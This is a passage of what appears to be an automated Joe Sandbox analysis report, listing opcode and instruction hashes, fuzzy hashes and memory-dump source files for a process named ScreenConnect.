                                                                • Instruction ID: b6a4371e5fa5258682c710c82c639db8500c946f086477dcb31ecc2b9e8858d1
                                                                • Opcode Fuzzy Hash: e674f9e9b602918b307abbc5aba37e7c838dd66e54e20a6702d4201089a61caa
                                                                • Instruction Fuzzy Hash: 8C21D531E0120A9BDB28EBB0D8587AE7BBABF8C710F189568D402B73D4EF704841DB50
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c753bee1e1158e613ba80d9d0b5828af47feb15c7a5c07e57c3ac1de99b75749
                                                                • Instruction ID: d2461e918dff0e175e1e3df181f1f6998790d9a7c631ac7defbeda03a7c19afc
                                                                • Opcode Fuzzy Hash: c753bee1e1158e613ba80d9d0b5828af47feb15c7a5c07e57c3ac1de99b75749
                                                                • Instruction Fuzzy Hash: CB11EB76B102195FEF1AEF7498206AE3763EFC8250B104529E516DB384DF354D1287D5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b72309566afb58901158fd4b2c3a769e7e4000e70342773342222893d7efd3f4
                                                                • Instruction ID: 4551967c2b93e89be1e83b7735a72666b48800faacacada4ec0e936ea15dc089
                                                                • Opcode Fuzzy Hash: b72309566afb58901158fd4b2c3a769e7e4000e70342773342222893d7efd3f4
                                                                • Instruction Fuzzy Hash: 30218031A04205DBDB14EF58C494ADABBB2FF48310F568199C846AB755DB71FC42CBD0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: af9f96781cc32e25ccd907d0e9eee7afc75c23f6bfc51a7b3ddeedb66188886c
                                                                • Instruction ID: 6bb9b1f2b43b10ceeffaaefcea240acd0d592c56e42d35f5595bb08315b010e1
                                                                • Opcode Fuzzy Hash: af9f96781cc32e25ccd907d0e9eee7afc75c23f6bfc51a7b3ddeedb66188886c
                                                                • Instruction Fuzzy Hash: 6021147680024ADFCF10CFAAC845ADEBBB1FF88310F158529E964A7210C379A555DFA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fdd40ba63cb8f4e6b2365f84928f8c8dfaf5353f6c8cd2409f355f33cd61fd3a
                                                                • Instruction ID: 4da7dc23f2665614f99b14c87632d8ae0935dcf06259570bb3a748880427162f
                                                                • Opcode Fuzzy Hash: fdd40ba63cb8f4e6b2365f84928f8c8dfaf5353f6c8cd2409f355f33cd61fd3a
                                                                • Instruction Fuzzy Hash: 21215E74B0021ADFEB05DFA8E8545AEBBB2FF99300B004599D905EB361DF30AD06CB51
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7add95abfec6c04f33333faeae2d107a62174e7551b4bcd6e79a585f068d5dc5
                                                                • Instruction ID: 1fb844c4d964b4c056433bb57c90ed89b858971e22c241e701517942892c93ae
                                                                • Opcode Fuzzy Hash: 7add95abfec6c04f33333faeae2d107a62174e7551b4bcd6e79a585f068d5dc5
                                                                • Instruction Fuzzy Hash: 0C11AF32E20B1A99DB10AAB8D8504EAF7B5FFD5310F00CB2AE95577110FB70A694C7C0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 917f9af1e7c5cdfc7ce3031fed31000d64f8e3cbad02dd0c11031a89ae216ca0
                                                                • Instruction ID: 5a8548f25709faf6e0506841293050e4efb6ffe6e49e5184017f87d00b49016b
                                                                • Opcode Fuzzy Hash: 917f9af1e7c5cdfc7ce3031fed31000d64f8e3cbad02dd0c11031a89ae216ca0
                                                                • Instruction Fuzzy Hash: B221257680024ADFCF10CF9AC844ADEBBF5FB88310F148429E914A7210C379A555DFA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 84d3b0eccc97785fb9fa05327e85ca8855d8aea8494acf11a2324b8898f37f9b
                                                                • Instruction ID: 50808cc3c98579344db4310f89b5f3d3410935213ae4c0c75c8307bea9c67871
                                                                • Opcode Fuzzy Hash: 84d3b0eccc97785fb9fa05327e85ca8855d8aea8494acf11a2324b8898f37f9b
                                                                • Instruction Fuzzy Hash: B6116371A046599FDB15DF6AC8448BAFBF5FF893247108665E039D76A0E7309D01CB50
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d68d4d0cbd6dbbfb18665a849ded7b92804ec1b22fb62c9b911f4b83cb8b736b
                                                                • Instruction ID: b67e7393c3652ea71ac7918aa387c5ed6281f8c16244aa723c09656bca43e18b
                                                                • Opcode Fuzzy Hash: d68d4d0cbd6dbbfb18665a849ded7b92804ec1b22fb62c9b911f4b83cb8b736b
                                                                • Instruction Fuzzy Hash: 02215832D10B0B8DCB11EFB9D8505EAFBB4EF99300F00C62AD558A7111FB70A2958B91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 645513e7f2fb37a59d11c205a46482d24e688278d37fa61ed8c2cee97b6b250a
                                                                • Instruction ID: 5b9d24ece1c90ba7640f7db5108c86a3e1331b72018899b74eae4c2ac1209034
                                                                • Opcode Fuzzy Hash: 645513e7f2fb37a59d11c205a46482d24e688278d37fa61ed8c2cee97b6b250a
                                                                • Instruction Fuzzy Hash: AC214831F1120A9BDB28EB61D4587AEBBFABF8C710F149468D402B7294EF715C41DB54
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 997b8d6abfe25e2618ac3d4545d1f39568b6abdb712c2ae2c170547c74227a8c
                                                                • Instruction ID: 4a4d4ddcbf9b6187b966adc929807a038f7c30ba9222b701ed49ffb6b020c792
                                                                • Opcode Fuzzy Hash: 997b8d6abfe25e2618ac3d4545d1f39568b6abdb712c2ae2c170547c74227a8c
                                                                • Instruction Fuzzy Hash: 3A2115B1C002599FDB10CFAAD884BEEFBF4EB48310F15842AE554A7241D379A945CFA5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f7b2851c58d3d3f7473f62150027b635750556104d25a2dae8520c28230678e
                                                                • Instruction ID: 5320fc259889c0995ad805ab6daa00d46ff9b3df4dd07576d95001fb7b98bf85
                                                                • Opcode Fuzzy Hash: 3f7b2851c58d3d3f7473f62150027b635750556104d25a2dae8520c28230678e
                                                                • Instruction Fuzzy Hash: 51116D353406208FD715DB28D994B6A77A2FFC4711F0548ADE5068B360CB75EC16CB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: beb15dfd3e563511dcbe8044954fdb05eea8ab53890441cb0916e789f5d83f37
                                                                • Instruction ID: 32fbc6257be3c3d1ea7d88cf48172453b3e2c6cd2924ef476f5f4cb24e53f9d6
                                                                • Opcode Fuzzy Hash: beb15dfd3e563511dcbe8044954fdb05eea8ab53890441cb0916e789f5d83f37
                                                                • Instruction Fuzzy Hash: 81115131B1020ADFCB14DB69D9919EFBBB5FF85310B408569E6199B314EB70E905CBD0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5667f53b9fea0796f16f0187634d6716d1e470c5d19cbdcc44ad67643da561e8
                                                                • Instruction ID: 282d2fcedcd595e94883a0521b428eb0bcf6f77143426c72ebb4fea9d435b7b1
                                                                • Opcode Fuzzy Hash: 5667f53b9fea0796f16f0187634d6716d1e470c5d19cbdcc44ad67643da561e8
                                                                • Instruction Fuzzy Hash: 28114934A002189FDB04DF68C9A5AADBBF2EF89310F158559D545EB3A1CB75AD02CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8a33bb493e8fcf00665ebb5a144e48ca140a810002e9bbb1a0040357449abecf
                                                                • Instruction ID: 02c149c63de549e486d7879c9c69a2462df68ce53dac396489866ae5238d2614
                                                                • Opcode Fuzzy Hash: 8a33bb493e8fcf00665ebb5a144e48ca140a810002e9bbb1a0040357449abecf
                                                                • Instruction Fuzzy Hash: DF1186357141118FCB14E77D985096AB7F6EFC6640B1856AED905CB355EB30EC0583D1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c8e98b6a5f0465fc86a021a35ea000a57dfd956717b56045d0926016b6f34f45
                                                                • Instruction ID: 60cced6e8247200bfb2a9f4ec15f2c023fb9b364b7305689035f73c397bc9b7a
                                                                • Opcode Fuzzy Hash: c8e98b6a5f0465fc86a021a35ea000a57dfd956717b56045d0926016b6f34f45
                                                                • Instruction Fuzzy Hash: CC018C367401218FC708DA6EF89496AB7AAFBC932131985BAE50AC7320CE32DC138754
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6e6b235f3bbc09a8a46f560b29ec837dbb2c6f48ac7cdf6ec0cddd45006e537b
                                                                • Instruction ID: 83e0fa6292570f2d95536c562b90e9602375e99adb5037601eb565d60135f686
                                                                • Opcode Fuzzy Hash: 6e6b235f3bbc09a8a46f560b29ec837dbb2c6f48ac7cdf6ec0cddd45006e537b
                                                                • Instruction Fuzzy Hash: E9118A32204109AF9705DF69EC909AFBBBAFF85210714852EE515D7210EB33E9168BD0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8e53381f1aa00a61b6d5d18f0143feca0154766de7314cbf6c6756ee09e7dae8
                                                                • Instruction ID: 8552538b13b763615bb34b455d0b77d663cfe49d26a96b5f8a78851852493fc4
                                                                • Opcode Fuzzy Hash: 8e53381f1aa00a61b6d5d18f0143feca0154766de7314cbf6c6756ee09e7dae8
                                                                • Instruction Fuzzy Hash: 02116A353407208FDB19DB28D9A4A6A77E2FFC9711B4148ADE5068B3A0DF75EC16CB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d404687b0dd35134a6a59d3dc909db602e34de40c2b65760cab0677fb9eb898f
                                                                • Instruction ID: d1f2c41ad6653625aaec1938b1a1185abc35fbd7ef4c15c1304525f541eb326e
                                                                • Opcode Fuzzy Hash: d404687b0dd35134a6a59d3dc909db602e34de40c2b65760cab0677fb9eb898f
                                                                • Instruction Fuzzy Hash: 232106B1C042599FDB10CFAAD844BEEFBF8EB48320F15842AE554A7241C379A545CFA5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3392100124.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_124d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                • Instruction ID: 7ff89e2ad25346a5577fc6218e5f51a6efd16cdc3bfb2d25576aae07737bc1b3
                                                                • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                • Instruction Fuzzy Hash: 3E11D676504284DFCB1ACF54D5C4B16BF71FB94314F24C5A9D9090B257C336D456CB91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5469f858fd67e3604352f37a14d34e033524049a6fa8ad0f6379f215caa3f809
                                                                • Instruction ID: e0da7f540582a463790fdd4d89c0245cc1eea247618492ea1f451a20f0897f66
                                                                • Opcode Fuzzy Hash: 5469f858fd67e3604352f37a14d34e033524049a6fa8ad0f6379f215caa3f809
                                                                • Instruction Fuzzy Hash: C7117C316093808FE716DB38DC64559BFB2EE4725030A89EBD545CF2B7DA35980AC7A2
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc5b3f04c0c7d60820b6c779e58ac2f1f9eb93bc9b584d9017d8ca736c45cdbf
                                                                • Instruction ID: 8d4311785b3ded23ee19d51c33363cb00fe212bf01582a061d5e41bd701b71ca
                                                                • Opcode Fuzzy Hash: bc5b3f04c0c7d60820b6c779e58ac2f1f9eb93bc9b584d9017d8ca736c45cdbf
                                                                • Instruction Fuzzy Hash: 53211D74F1021ADFFF04EBA8E8589AEBBB6FB98300B104569D905A7360DF30AD058B51
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b14543f291b0481519fb9c10f6a6287341bb2ee34d39187d422bb7f103e4b48
                                                                • Instruction ID: 9797183e4f9c2d515524757f2e1182f2cc69a3f2bc11d26b5dff989e51278c56
                                                                • Opcode Fuzzy Hash: 9b14543f291b0481519fb9c10f6a6287341bb2ee34d39187d422bb7f103e4b48
                                                                • Instruction Fuzzy Hash: 810188723042059F9705DB69EC919AEBBB6FFC5220750C53EE519DB200EF32E90687A0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9d62bdb37f626d7f7c624607cea0a04cd01ac423810572b4f7ffa16f3fc30a94
                                                                • Instruction ID: 7e4aad6dfc7e2af1092bb9ad5344b6fd41a3bcfafd3c80d44b8814cf051aec03
                                                                • Opcode Fuzzy Hash: 9d62bdb37f626d7f7c624607cea0a04cd01ac423810572b4f7ffa16f3fc30a94
                                                                • Instruction Fuzzy Hash: 86110A34B00218DFDB04DF68C995AADB7F2AF8D310F158569D905EB365CB75AD018B90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb9b54f01508a3d893ff39a6eee49c0d0d3cce203fbb2e671a1a423e4e159618
                                                                • Instruction ID: 743b01d6d2c6456e2f7d60d369b041a88417a0b6235c935e726d960e23b5ecb9
                                                                • Opcode Fuzzy Hash: eb9b54f01508a3d893ff39a6eee49c0d0d3cce203fbb2e671a1a423e4e159618
                                                                • Instruction Fuzzy Hash: 7E1103B1C042498FDB10CF9AC445BEEFBF8EB48320F158429D558A7241C379A545CFA5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a26d0822f40f701d2cb288e1fc2cdbf2ca6a64d848b1c162c23d9332e482ff4c
                                                                • Instruction ID: e8d3b99fb4f68ee7598a00feb1dfea60b6323639b012ef1de10057dd1164c7b0
                                                                • Opcode Fuzzy Hash: a26d0822f40f701d2cb288e1fc2cdbf2ca6a64d848b1c162c23d9332e482ff4c
                                                                • Instruction Fuzzy Hash: 0F11D335A00209CFDB14CFA8E588ADDBBF2EF8C315F148569E516AB360DB74AC45CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ecc37cf6d6833fe874d1b06423477557ff2770073b051f06e791217233421eab
                                                                • Instruction ID: 1a5dc5adaaf8357fd5be27cd780222b59de622cc3b327590fee2c404a7e777b7
                                                                • Opcode Fuzzy Hash: ecc37cf6d6833fe874d1b06423477557ff2770073b051f06e791217233421eab
                                                                • Instruction Fuzzy Hash: 0811EFB1C046498FDB10CF9AC845BEEFBF8EB88320F15842AD558B7241D379A945CFA5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a7860f0e4954f7062ae37299592f1bee4228c9900ab2657e46defba2117acbe2
                                                                • Instruction ID: 58d886fd1da555103bdad52ddbcaac32151bc94ff36115cd9258fb9351e399e4
                                                                • Opcode Fuzzy Hash: a7860f0e4954f7062ae37299592f1bee4228c9900ab2657e46defba2117acbe2
                                                                • Instruction Fuzzy Hash: 270196357006168FC720DF69D49451AB7DAEFCC6553184058E94AD7350DF30EC02CB84
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5398b2f7b12f2a12ef830e1eb9b508e91256739ef09f2cded32d6d6eb34d1429
                                                                • Instruction ID: bcc2ed884b9d07cab45f602cfc22e21e56ed5497817e27782206461af5299628
                                                                • Opcode Fuzzy Hash: 5398b2f7b12f2a12ef830e1eb9b508e91256739ef09f2cded32d6d6eb34d1429
                                                                • Instruction Fuzzy Hash: C901247131021527E308F7B9A4A4AAFB6D2EBE1124700853CD10A9B350EE30EC48C380
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d13cbf81f27263db62f7f5d40ea642e0d6e5694b5b8342f59e03d78fc2f8dc59
                                                                • Instruction ID: c074045f25ef9955f93bb73c7accd5ede16d9ba4783e0fa3569aa4fc42b63f8b
                                                                • Opcode Fuzzy Hash: d13cbf81f27263db62f7f5d40ea642e0d6e5694b5b8342f59e03d78fc2f8dc59
                                                                • Instruction Fuzzy Hash: 5B014F75B101059F9B18CF6ADC488BBB7FAFBC92117548529E905E7250D770EC018AA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f67d3c2fdbcd08516b6530665d968ccc27b7aba767be898198d781f6c884e757
                                                                • Instruction ID: cc6ce34b4082c6be1e89c548766e81780b40047e090f6c0eda6803a6551b471a
                                                                • Opcode Fuzzy Hash: f67d3c2fdbcd08516b6530665d968ccc27b7aba767be898198d781f6c884e757
                                                                • Instruction Fuzzy Hash: 3C11E576E48389DFDB06CB74D9186387BB2EB47305B1441DAD845CB2A2EA358E12CB01
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3392100124.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_124d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e1f0c712921494f98b5194bdb2d90ab8ec1d91a9a7bd0fe19e4ebf820c3559f
                                                                • Instruction ID: 83c01670439b421d2e52c84dff0a72202a09c4dc761aba3ed6edf8aa60c14a4b
                                                                • Opcode Fuzzy Hash: 9e1f0c712921494f98b5194bdb2d90ab8ec1d91a9a7bd0fe19e4ebf820c3559f
                                                                • Instruction Fuzzy Hash: 3C018C7144D3C49FE7174B258C94762BFA8EF53220F1984CBE9888F2A3C2695C45C772
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed6bcb29ae83126abf73441117a38028d63b612f327516415375dd20d7e2903a
                                                                • Instruction ID: cf7a41c893d27344088e2f039d72d58f4be028dd55c8214b3b13d0704d4d7fc0
                                                                • Opcode Fuzzy Hash: ed6bcb29ae83126abf73441117a38028d63b612f327516415375dd20d7e2903a
                                                                • Instruction Fuzzy Hash: F301D6722042409BE3159779F991BEABF69EBD2261B44867ED209CB200EF77981987D0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bf5aafe6893691117c82af479b86274c639d71ca5696f9d255e29a182c0f7804
                                                                • Instruction ID: 69786862d95bf273fc1ee1d52490250b017829989c3127b37d7e28b3a51cb541
                                                                • Opcode Fuzzy Hash: bf5aafe6893691117c82af479b86274c639d71ca5696f9d255e29a182c0f7804
                                                                • Instruction Fuzzy Hash: 1E014071E0021A8FCB40DFB9E8546AEBBF5FF88310F108669D559E3345EB34AA158B90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3392100124.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_124d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 963d545f36f96fbdd3424bf30ed809557be6f7ba8effe50fa0f8ab73a9521be5
                                                                • Instruction ID: e737c35fcaef69ee781f803e70ade780385993b2421ca9c05b21542ba8408702
                                                                • Opcode Fuzzy Hash: 963d545f36f96fbdd3424bf30ed809557be6f7ba8effe50fa0f8ab73a9521be5
                                                                • Instruction Fuzzy Hash: AA012631018348EBEB144F69CC80B67FFD8EF527A0F18C41AEE480B282C2B99845C6B1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4e7471e5dbc760f2e00511b3486f26216d60e43ad260d96e5d016509f3e19490
                                                                • Instruction ID: 999c7ac79743fb35316a3b8681a8a69807844f4c4231cafcac1481932ef5ac2c
                                                                • Opcode Fuzzy Hash: 4e7471e5dbc760f2e00511b3486f26216d60e43ad260d96e5d016509f3e19490
                                                                • Instruction Fuzzy Hash: E101A4B1A042499FEB14DB7E9C00AFBBBFAEF49330B004675E128D3695E7749902CB50
                                                                Memory Dump Source
